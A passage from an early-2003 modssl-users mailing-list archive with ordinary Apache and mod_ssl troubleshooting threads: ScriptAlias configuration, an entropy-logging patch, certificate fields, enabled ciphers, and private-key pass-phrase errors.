> --enable-proxy --enable-usertrack --enable-headers --enable-expires \
> --enable-cern-meta --enable-mime-magic --enable-deflate
--enable-case-filter-i
n \
> --enable-case-filter --enable-ext-filter --enable-example
--enable-mem-cache \

> --enable-disk-cache --enable-cache --enable-charset-lite \
> --enable-echo --enable-file-cache --enable-auth-dbm \
> --enable-rewrite --enable-vhost-alias \
> --enable-optional-hook-export --enable-optional-hook-import \
>  --enable-optional-fn-import --enable-optional-fn-export
--enable-unique-id \
>  --enable-cgi --enable-cgid --with-mpm=worker
--with-ssl=/usr/local/openssl \
> --enable-auth-digest --enable-static-htdigest --enable-ssl



SSL.CONF






Alias   /otoniel        "/web/htdocs/labvis/gente/becarios/otoniel"
ScriptAlias     /cgi-bin/       "/web/htdocs/labvis/cgi-bin"
ScriptAlias /cgi-bin /web/htdocs/labvis/cgi-bin
ScriptAlias /lab-bin /web/htdocs/labvis/cgi-bin
ScriptAlias /garp-bin/ "/web/htdocs/labvis/biodi.sdsc.edu/inicio/cgi-bin/"

ScriptAlias     /mailman/       /export/home/mailman/cgi-bin/
ScriptAlias     /cgi-bin/       /export/home/mailman/cgi-bin
ScriptAlias     /cgi-mail       "/export/home/mailman/cgi-bin/"


##############   Labvis ###################
ScriptAlias     /cgi-bin/       "/web/htdocs/labvis/cgi-bin/"
ScriptAlias     /cgi-bin/       "/web/htdocs/labvis/cgi-bin/modelacion"
ScriptAlias     /lab-bin/       "/web/htdocs/labvis/cgi-bin/"
ScriptAlias     /garp-bin/
"/web/htdocs/labvis/biodi.sdsc.edu/inicio/cgi-bi
n/"
ScriptAlias      /hjg/          "/export/home/hjg/cgi/"





______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 27 09:56:44 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9751D2AA0B4; Mon, 27 Jan 2003 09:56:44 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id 2107B2AA08A
	for ; Mon, 27 Jan 2003 09:56:43 +0100 (CET)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id h0R8ucCl009868
	for ; Mon, 27 Jan 2003 09:56:38 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.12.6/8.12.6) with ESMTP id h0R8uamM003421
	for ; Mon, 27 Jan 2003 09:56:37 +0100 (MET)
Content-Class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: ScriptAlias 
Date: Mon, 27 Jan 2003 09:56:36 +0100
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: ScriptAlias 
Importance: normal
thread-index: AcLD1s++j3dBHyx/SgKUfSUplZQrpwCCpS1g
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

You have inconsistent notation and a confused mapping.

- Do not put a trailing slash on the alias or the directory.
- You should have only one ScriptAlias per CGI directory.
- You can match only one directory to each alias (you can have two
aliases for one directory).

... it's like buses: Two buses can go to the same destination, but one
bus can't go to two destinations :-)

PS This has nothing to do with SSL. It is just a config problem with
apache.

Rgds,

Owen Boyle



>-----Original Message-----
>From: Ortiz Ruiz Otoniel Manuel [mailto:ormanuel@uxmcc2.iimas.unam.mx]
>Sent: Freitag, 24. Januar 2003 19:37
>To: modssl-users@modssl.org
>Subject: ScriptAlias 
>
>
>
>I have a problem trying to execute cgis under ssl. (It doesn't find the
>URL, a kind of problem with the scriptalias). 
>
>I compiled apache2 with ssl, this are the options that I used.
>At the bottom there is a fragment of my ssl.conf.
>
>Any help will be appreciated
>
>
>OPTIONS:
>#  CC=gcc ./configure --prefix=/web/apache2 --enable-dav 
>--enable-info \
>> --enable-http --enable-proxy-ftp --enable-proxy-connect
>--enable-proxy-http \
>> --enable-proxy --enable-usertrack --enable-headers --enable-expires \
>> --enable-cern-meta --enable-mime-magic --enable-deflate
>--enable-case-filter-i
>n \
>> --enable-case-filter --enable-ext-filter --enable-example
>--enable-mem-cache \
>
>> --enable-disk-cache --enable-cache --enable-charset-lite \
>> --enable-echo --enable-file-cache --enable-auth-dbm \
>> --enable-rewrite --enable-vhost-alias \
>> --enable-optional-hook-export --enable-optional-hook-import \
>>  --enable-optional-fn-import --enable-optional-fn-export
>--enable-unique-id \
>>  --enable-cgi --enable-cgid --with-mpm=worker
>--with-ssl=/usr/local/openssl \
>> --enable-auth-digest --enable-static-htdigest --enable-ssl
>
>
>
>SSL.CONF
>
>
>
>
>
>
>Alias   /otoniel        "/web/htdocs/labvis/gente/becarios/otoniel"
>ScriptAlias     /cgi-bin/       "/web/htdocs/labvis/cgi-bin"
>ScriptAlias /cgi-bin /web/htdocs/labvis/cgi-bin
>ScriptAlias /lab-bin /web/htdocs/labvis/cgi-bin
>ScriptAlias /garp-bin/ 
>"/web/htdocs/labvis/biodi.sdsc.edu/inicio/cgi-bin/"
>
>ScriptAlias     /mailman/       /export/home/mailman/cgi-bin/
>ScriptAlias     /cgi-bin/       /export/home/mailman/cgi-bin
>ScriptAlias     /cgi-mail       "/export/home/mailman/cgi-bin/"
>
>
>##############   Labvis ###################
>ScriptAlias     /cgi-bin/       "/web/htdocs/labvis/cgi-bin/"
>ScriptAlias     /cgi-bin/       "/web/htdocs/labvis/cgi-bin/modelacion"
>ScriptAlias     /lab-bin/       "/web/htdocs/labvis/cgi-bin/"
>ScriptAlias     /garp-bin/
>"/web/htdocs/labvis/biodi.sdsc.edu/inicio/cgi-bi
>n/"
>ScriptAlias      /hjg/          "/export/home/hjg/cgi/"
>
>
>
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 27 10:03:27 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 25EF92AA0B4; Mon, 27 Jan 2003 10:03:27 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from gamay.kronodoc.fi (gamay.kronodoc.fi [195.255.175.66])
	by master.modssl.org (Postfix) with ESMTP id A54892AA08A
	for ; Mon, 27 Jan 2003 10:03:23 +0100 (CET)
Received: by gamay.kronodoc.fi (Postfix, from userid 501)
	id 8057D1401D; Mon, 27 Jan 2003 11:03:19 +0200 (EET)
Received: from localhost (localhost [127.0.0.1])
	by gamay.kronodoc.fi (Postfix) with ESMTP id 597C72409C
	for ; Mon, 27 Jan 2003 11:03:19 +0200 (EET)
Date: Mon, 27 Jan 2003 11:03:19 +0200 (EET)
From: Marko Asplund 
To: modssl-users@modssl.org
Subject: entropy source logging request (patch included)
Message-ID: 
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="-3980625-121458679-1043658199=:24441"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Marko Asplund 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime@docserver.cac.washington.edu for more info.

---3980625-121458679-1043658199=:24441
Content-Type: TEXT/PLAIN; charset=US-ASCII


i thought it might be usefull for mod_ssl to log (at debug level) the
entropy source from which the PRNG will be seeded from so that proper
entropy source configuration can be verified. i've attached a small patch
(mod_ssl-2.8.12-1.3.27) which does this.

best regards,
-- 
	aspa					http://www.kronodoc.fi/

---3980625-121458679-1043658199=:24441
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="sslenginerand.patch"
Content-Transfer-Encoding: BASE64
Content-ID: 
Content-Description: 
Content-Disposition: attachment; filename="sslenginerand.patch"

KioqIHBrZy5zc2xtb2Qvc3NsX2VuZ2luZV9yYW5kLmMub3JpZwlNb24gSmFu
IDI3IDEwOjA3OjI2IDIwMDMNCi0tLSBwa2cuc3NsbW9kL3NzbF9lbmdpbmVf
cmFuZC5jCU1vbiBKYW4gMjcgMTA6NDA6NDYgMjAwMw0KKioqKioqKioqKioq
KioqDQoqKiogODcsOTIgKioqKg0KLS0tIDg3LDk4IC0tLS0NCiAgICAgIHRp
bWVfdCB0Ow0KICAgICAgcGlkX3QgcGlkOw0KICAgICAgaW50IG07DQorICAg
ICBjaGFyICpjdHhOYW1lc1tdID0geyAiIiwgInN0YXJ0dXAiLCAiY29ubmVj
dCIgfTsNCisgICAgIGNoYXIgKnJzc3JjTmFtZXNbXSA9IHsgIiIsICJidWls
dGluIiwgImZpbGUiLCAiZXhlYyINCisgI2lmIFNTTF9MSUJSQVJZX1ZFUlNJ
T04gPj0gMHgwMDkwNTEwMA0KKyAJCQkgICAsICJFR0QiDQorICNlbmRpZg0K
KyAgICAgfTsNCiAgDQogICAgICBtYyA9IG15TW9kQ29uZmlnKCk7DQogICAg
ICBuUmVxICA9IDA7DQoqKioqKioqKioqKioqKioNCioqKiA5NywxMDIgKioq
Kg0KLS0tIDEwMywxMTEgLS0tLQ0KICAgICAgICAgIHBSYW5kU2VlZCA9ICZw
UmFuZFNlZWRzW2ldOw0KICAgICAgICAgIGlmIChwUmFuZFNlZWQtPm5DdHgg
PT0gbkN0eCkgew0KICAgICAgICAgICAgICBuUmVxICs9IHBSYW5kU2VlZC0+
bkJ5dGVzOw0KKyANCisgCSAgICBzc2xfbG9nKHMsIFNTTF9MT0dfREVCVUcs
ICIlc1JlcXVlc3RpbmcgJWQgYnl0ZXMgb2YgZW50cm9weSBmcm9tICVzOiVz
IGluICclcycgY29udGV4dCIsIHByZWZpeCwgcFJhbmRTZWVkLT5uQnl0ZXMs
IHJzc3JjTmFtZXNbcFJhbmRTZWVkLT5uU3JjXSwgcFJhbmRTZWVkLT5jcFBh
dGgsIGN0eE5hbWVzW3BSYW5kU2VlZC0+bkN0eF0pOw0KKyANCiAgICAgICAg
ICAgICAgaWYgKHBSYW5kU2VlZC0+blNyYyA9PSBTU0xfUlNTUkNfRklMRSkg
ew0KICAgICAgICAgICAgICAgICAgLyoNCiAgICAgICAgICAgICAgICAgICAq
IHNlZWQgaW4gY29udGVudHMgb2YgYW4gZXh0ZXJuYWwgZmlsZQ0K
---3980625-121458679-1043658199=:24441--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 27 11:59:37 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A2C6B2AA0B4; Mon, 27 Jan 2003 11:59:37 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from odin2.bull.net (odin2.bull.net [192.90.70.84])
	by master.modssl.org (Postfix) with ESMTP id 9C20A2AA08A
	for ; Mon, 27 Jan 2003 11:59:34 +0100 (CET)
Received: from frn-001.evcl.evidian.com (frn-001.frcl.bull.fr [129.182.8.51])
	by odin2.bull.net (8.9.3/8.9.3) with ESMTP id MAA20340
	for ; Mon, 27 Jan 2003 12:01:13 +0100
Received: from biguine ([129.182.22.21])
          by frn-001.evcl.evidian.com (Lotus Domino Release 5.0.8)
          with SMTP id 2003012711591917:715 ;
          Mon, 27 Jan 2003 11:59:19 +0100 
Message-ID: <00e201c2c5f2$cf112500$1516b681@biguine>
From: "Frederic Viollet" 
To: 
Subject: Mandatory fields in Certificate
Date: Mon, 27 Jan 2003 11:56:56 +0100
MIME-Version: 1.0
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
X-MIMETrack: Itemize by SMTP Server on FRN-001/EVIDIAN(Release 5.0.8 |June 18, 2001) at
 27/01/2003 11:59:19,
	Serialize by Router on FRN-001/EVIDIAN(Release 5.0.8 |June 18, 2001) at 27/01/2003
 11:59:26,
	Serialize complete at 27/01/2003 11:59:26
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_00DF_01C2C5FB.30C4C420"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Frederic Viollet" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_00DF_01C2C5FB.30C4C420
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain;
	charset="iso-8859-1"

Hello,

I'm trying to set up a "simple" SSL server (no client nor server =
verification)
I've noticed that, if a generate the server's certificate with a =
Microsoft CA, I make the SSL work. If the certificate is generated with =
a Netscape CA, it works ok.
While comparing the two certificates, I found some fields in the MS-CA =
that were not (or different) in the Netscape CA, and fields that were in =
the Netscape one and not in the MS one (NetscapeCertType was only =
visible in the Netscape one)...

Could you please tell me if some fields are mandatory in the server's =
certificate? I just want to set up a simple SSL transaction between my =
server and my client (without any client nor server verification)... =
This would help me greatly, thanks in advance...

Frederic Viollet
------=_NextPart_000_00DF_01C2C5FB.30C4C420
Content-Transfer-Encoding: quoted-printable
Content-Type: text/html;
	charset="iso-8859-1"









Hello,


 


I'm trying to set up a "simple" SSL =
server (no=20
client nor server verification)


I've noticed that, if a generate the =
server's=20
certificate with a Microsoft CA, I make the SSL work. If the =
certificate is=20
generated with a Netscape CA, it works ok.


While comparing the two certificates, =
I found=20
some fields in the MS-CA that were not (or different) in the =
Netscape CA,=20
and fields that were in the Netscape one and not in the MS one=20
(NetscapeCertType was only visible in the Netscape one)...


 


Could you please tell me if some fields =
are=20
mandatory in the server's certificate? I just want to set up a =
simple SSL=20
transaction between my server and my client (without any client nor =
server=20
verification)... This would help me greatly, thanks in =
advance...


 


Frederic =
Viollet


------=_NextPart_000_00DF_01C2C5FB.30C4C420--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 27 18:42:34 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7E52C2AA0D2; Mon, 27 Jan 2003 18:42:34 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from cathedral.teiresias.net (k215.denver.dsl.forethought.net [216.241.42.215])
	by master.modssl.org (Postfix) with ESMTP id 73A0C2AA0D1
	for ; Mon, 27 Jan 2003 18:42:23 +0100 (CET)
Received: from winter.teiresias.net (IDENT:2OHcuAWLzF9BSzwxeb2wSp8j501WuAsn@winter [192.168.10.15])
	by cathedral.teiresias.net (8.9.3/8.9.3) with ESMTP id KAA24588
	for ; Mon, 27 Jan 2003 10:46:24 -0700
Received: (from tyr@localhost)
	by winter.teiresias.net (8.11.6/8.9.3) id h0RHlRk29332
	for modssl-users@modssl.org; Mon, 27 Jan 2003 10:47:27 -0700
Date: Mon, 27 Jan 2003 10:47:27 -0700
From: Steve Chadsey 
To: modssl-users@modssl.org
Subject: Re: Verifying enabled ciphers?
Message-ID: <20030127104727.G24717@winter.teiresias.net>
References: <9B66BBD37D5DD411B8CE00508B69700F033F25A9@pborolocal.rnib.org.uk>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
In-Reply-To: <9B66BBD37D5DD411B8CE00508B69700F033F25A9@pborolocal.rnib.org.uk>; from John.Airey@rnib.org.uk on Fri, Jan 24, 2003 at 09:30:28AM -0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Steve Chadsey 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, Jan 24, 2003 at 09:30:28AM -0000, John.Airey@rnib.org.uk wrote:
> Try http://www.netcraft.com/sslwhats. It will give you a list of ciphers.
> 

OK.  I did that, and the only one I support is "RC4 with MD5".  Strange, I
thought I would be able to support more.  Actually, to amend my previous
post, the ones I expected to see were:

EDH-RSA-DES-CBC3-SHA 
EDH-DSS-DES-CBC3-SHA
DES-CBC3-SHA
DHE-DSS-RC4-SHA
IDEA-CBC-SHA
RC4-SHA
RC4-MD5

since I have SSLv2 shut off.  Would the above list be further limited
by the type (RSA / DSA) key I have?  It is RSA.


> To unpack the terms:
>  
> "allows anonymous authentication" - That sounds like allowing anyone to

I believe they mean Anonymous Diffie-Helman.  My SSLCipherSuite line
excludes those, so I think they're wrong here.

> "allows cleartext communication" - That's what you get on non-secured sites.
> If the data doesn't need to be secured, there's no issue.

I believe they are referring to the NULL-MD5 cipher.  I tested that
with s_client, and I can't connect ('handshake failure'), so I don't
believe I'm supporting that one either.

> 
> "supports weak encryption" - Allows older browsers that have
> "export-crippled" security to connect. On the above Netcraft site, you'll
> see "export version". The question for you is whether it is satisfactory to

Yeah, I include only 'HIGH' and 'MEDIUM' strength ciphers, according
to my SSLCipherSuite line.  

To follow up to Lutz, I tested all the ciphers with s_client against
my server.  The ones that I connected with were:

DES-CBC3-SHA
EDH-RSA-DES-CBC3-SHA
IDEA-CBC-SHA
RC4-MD5
RC4-SHA

This is a shorter list than what I was expecting (at the top of
this message).

The following did not connect, giving me a 'handshake failure':
ADH-DES-CBC3-SHA 
ADH-DES-CBC-SHA
ADH-RC4-MD5
DES-CBC-SHA
DHE-DSS-RC4-SHA
EDH-DSS-DES-CBC3-SHA
EDH-DSS-DES-CBC-SHA
EDH-RSA-DES-CBC-SHA
EXP1024-DES-CBC-SHA
EXP1024-DHE-DSS-DES-CBC-SHA
EXP1024-DHE-DSS-RC4-SHA
EXP1024-RC2-CBC-MD5
EXP1024-RC4-MD5
EXP1024-RC4-SHA
EXP-ADH-DES-CBC-SHA
EXP-ADH-RC4-MD5
EXP-DES-CBC-SHA
EXP-EDH-DSS-DES-CBC-SHA
EXP-EDH-RSA-DES-CBC-SHA
EXP-RC2-CBC-MD5
EXP-RC4-MD5

The following gave me 'illegal parameter':
DES-CBC3-MD5
DES-CBC-MD5
IDEA-CBC-MD5
RC2-CBC-MD5
RC4-64-MD5


Thanks,
-- 
Steve 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 27 19:16:31 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 65E652AA0B4; Mon, 27 Jan 2003 19:16:31 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mta01-svc.ntlworld.com (mta01-svc.ntlworld.com [62.253.162.41])
	by master.modssl.org (Postfix) with ESMTP id 0D2552AA08A
	for ; Mon, 27 Jan 2003 19:16:30 +0100 (CET)
Received: from linux ([80.6.84.116]) by mta01-svc.ntlworld.com
          (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP
          id <20030127181625.ZYTK22267.mta01-svc.ntlworld.com@linux>
          for ; Mon, 27 Jan 2003 18:16:25 +0000
Content-Type: text/plain;
  charset="us-ascii"
From: Chris Covell 
To: modssl-users@modssl.org
Subject: Client authnetication
Date: Mon, 27 Jan 2003 18:18:37 +0000
X-Mailer: KMail [version 1.4]
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Message-Id: <200301271818.37769.chris@katjam.co.uk>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Chris Covell 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello guys,

I have been using client authentication for a while now to verify the ide=
ntity=20
of users at our web site. We run our own CA and point to the certificate =
file=20
in SSLCACertificateFile in httpd.conf.

Now this all seems to work fine, but have the following errors in=20
/var/log/httpd/error_log

[Mon Jan 27 18:35:19 2003] [error] mod_ssl: Re-negotiation handshake fail=
ed:=20
Not accepted by client!?
[Mon Jan 27 18:35:19 2003] [error] mod_ssl: SSL error on writing data (Op=
enSSL=20
library error follows)
[Mon Jan 27 18:35:19 2003] [error] OpenSSL:=20
error:1409E0E5:lib(20):func(158):reason(229)

It seems strange as it seems to work.

I have looked through the archives and have seen reference to similar mes=
sages=20
but they don't seem to explain what the problem is.

I am running RedHat 7.2, mod_ssl 2.8.12-2, apache 1.3.27-1.7.2 (these are=
=20
RedHat rpm versions).

I have stmbled accross this error as I want to also authenticate clients =
whose=20
certificates are signed by a different CA. That is another issue as I am=20
getting strange results with that too. I thought I had better sort this o=
ne=20
out first.

Please can anyone shead some light on where I can find out  what this err=
or is=20
all about.

Many thanks

Chris Covell
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 27 20:53:08 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 554AB2AA0B4; Mon, 27 Jan 2003 20:53:08 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from serv01.aet.tu-cottbus.de (serv01.aet.TU-Cottbus.De [141.43.132.161])
	by master.modssl.org (Postfix) with ESMTP id 6CE342AA08A
	for ; Mon, 27 Jan 2003 20:53:02 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by serv01.aet.tu-cottbus.de (Postfix) with ESMTP id DCA173226
	for ; Mon, 27 Jan 2003 20:52:57 +0100 (MET)
Received: from serv01.aet.tu-cottbus.de ([127.0.0.1])
 by localhost (serv01 [127.0.0.1:10024]) (amavisd-new) with LMTP id 00787-01
 for ; Mon, 27 Jan 2003 20:52:54 +0100 (MET)
Received: by serv01.aet.tu-cottbus.de (Postfix, from userid 11019)
	id 81D663227; Mon, 27 Jan 2003 20:52:53 +0100 (MET)
Date: Mon, 27 Jan 2003 20:52:53 +0100
From: Lutz Jaenicke 
To: modssl-users@modssl.org
Subject: Re: Verifying enabled ciphers?
Message-ID: <20030127195253.GA1090@serv01.aet.tu-cottbus.de>
Mail-Followup-To: modssl-users@modssl.org
References: <9B66BBD37D5DD411B8CE00508B69700F033F25A9@pborolocal.rnib.org.uk> <20030127104727.G24717@winter.teiresias.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20030127104727.G24717@winter.teiresias.net>
Organization: BTU Cottbus, Allgemeine Elektrotechnik
User-Agent: Mutt/1.5.3i
X-Virus-Scanned: by amavisd-new
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lutz Jaenicke 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, Jan 27, 2003 at 10:47:27AM -0700, Steve Chadsey wrote:
> On Fri, Jan 24, 2003 at 09:30:28AM -0000, John.Airey@rnib.org.uk wrote:
> > Try http://www.netcraft.com/sslwhats. It will give you a list of ciphers.
> > 
> 
> OK.  I did that, and the only one I support is "RC4 with MD5".  Strange, I
> thought I would be able to support more.  Actually, to amend my previous
> post, the ones I expected to see were:
> 
> EDH-RSA-DES-CBC3-SHA 
> EDH-DSS-DES-CBC3-SHA
> DES-CBC3-SHA
> DHE-DSS-RC4-SHA
> IDEA-CBC-SHA
> RC4-SHA
> RC4-MD5
> 
> since I have SSLv2 shut off.  Would the above list be further limited
> by the type (RSA / DSA) key I have?  It is RSA.

Yes, it is limited by the key. Without a DSA key, you cannot use DSS ciphers.
Therefore being left:
 EDH-RSA-DES-CBC3-SHA
 DES-CBC3-SHA
 IDEA-CBC-SHA
 RC4-SHA
 RC4-MD5

> Yeah, I include only 'HIGH' and 'MEDIUM' strength ciphers, according
> to my SSLCipherSuite line.  
> 
> To follow up to Lutz, I tested all the ciphers with s_client against
> my server.  The ones that I connected with were:
> 
> DES-CBC3-SHA
> EDH-RSA-DES-CBC3-SHA
> IDEA-CBC-SHA
> RC4-MD5
> RC4-SHA

See above :-)

> The following gave me 'illegal parameter':
> DES-CBC3-MD5
> DES-CBC-MD5
> IDEA-CBC-MD5
> RC2-CBC-MD5
> RC4-64-MD5

These ciphers are SSLv2 ciphers.

Best regards,
	Lutz
-- 
Lutz Jaenicke                             Lutz.Jaenicke@aet.TU-Cottbus.DE
http://www.aet.TU-Cottbus.DE/personen/jaenicke/
BTU Cottbus, Allgemeine Elektrotechnik
Universitaetsplatz 3-4, D-03044 Cottbus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 27 21:04:00 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D0CC32AA0B4; Mon, 27 Jan 2003 21:04:00 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from matrix.pelathe.org (100.34.cm.sunflower.com [24.124.34.100])
	by master.modssl.org (Postfix) with ESMTP id 3F3412AA08A
	for ; Mon, 27 Jan 2003 21:03:55 +0100 (CET)
Received: from matrix (matrix.pelathe.org [192.168.1.200])
	by matrix.pelathe.org (Postfix) with ESMTP id 0450180E64
	for ; Mon, 27 Jan 2003 14:01:59 -0600 (CST)
Content-Type: text/plain;
  charset="us-ascii"
From: "A. Putnam" 
Organization: Pelathe Comminuty Resource Center
To: modssl-users@modssl.org
Subject: private key not found/server cert sign failed
Date: Mon, 27 Jan 2003 14:01:59 -0600
User-Agent: KMail/1.4.3
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Message-Id: <200301271401.59656.aputnam@pelathe.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "A. Putnam" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Can anyone tell me what this error means and how to fix it? I'm running a=
pache=20
1.3.26 with mod_ssl 2.8.10 on a SuSE8.1 box.

/etc/init.d/apache start returned 7 (Program is not running.)
Starting httpd [ Mailman PHP4 SSL ]Apache/1.3.26 mod_ssl/2.8.10 (Pass Phr=
ase=20
Dialog)
Some of your private key files are encrypted for security reasons.
In order to read them you have to provide us with the pass phrases.

Server matrix.pelathe.org:443 (RSA)
Enter pass phrase:
Apache:mod_ssl:Error: Private key not found.
**Stopped
stty: standard input: Inappropriate ioctl for device
=2E.failed

How do I get it to take my pass phrases? I must have skipped a file becau=
se=20
insofar I've given the same phrase to every file that's asked for it. Did=
 I=20
input the wrong information in one of the .conf files maybe? I get the=20
feeling that this is almost supidly simple to fix, but I just can't seem =
to=20
get it right.=20

It may or may not have something to do with this error I received when=20
recently self-signing my certificate:=20

1 out of 1 certificate requests certified, commit? [y/n]y
Write out database with 1 new entries
Data Base Updated
CA verifying: server.crt <-> CA cert
server.crt: /C=3DUS/ST=3DKS/L=3DLawrence/O=3DPelathe Community Resource=20
Center/CN=3Dwww.pelathe.org/Email=3Dtkitchen@pelathe.org

*this one>>>> error 18 at 0 depth lookup:self signed certificate

/C=3DUS/ST=3DKS/L=3DLawrence/O=3DPelathe Community Resource=20
Center/CN=3Dwww.pelathe.org/Email=3Dtkitchen@pelathe.org

*and this one>>>> error 7 at 0 depth lookup:certificate signature failure

Again, I have no clue why it failed these checks or how to fix them. Any =
help=20
would be appreciated. Thanks.

--=20
A. Putnam
Assistant IT Administrator
Pelathe Community Resource Center

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan 28 20:21:52 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7DD902AA0B4; Tue, 28 Jan 2003 20:21:52 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from vil.com.ua (vil.com.ua [193.109.102.42])
	by master.modssl.org (Postfix) with ESMTP id E46672AA081
	for ; Tue, 28 Jan 2003 20:21:48 +0100 (CET)
Received: from homecomp ([217.196.168.153])
	by vil.com.ua (8.12.6/8.12.5) with SMTP id h0SJLS3l048078
	for ; Tue, 28 Jan 2003 21:21:36 +0200 (EET)
	(envelope-from olebedew@vil.com.ua)
Message-ID: <002b01c2c702$a383a190$99a8c4d9@homecomp>
From: "Oleg Lyebyedyev" 
To: 
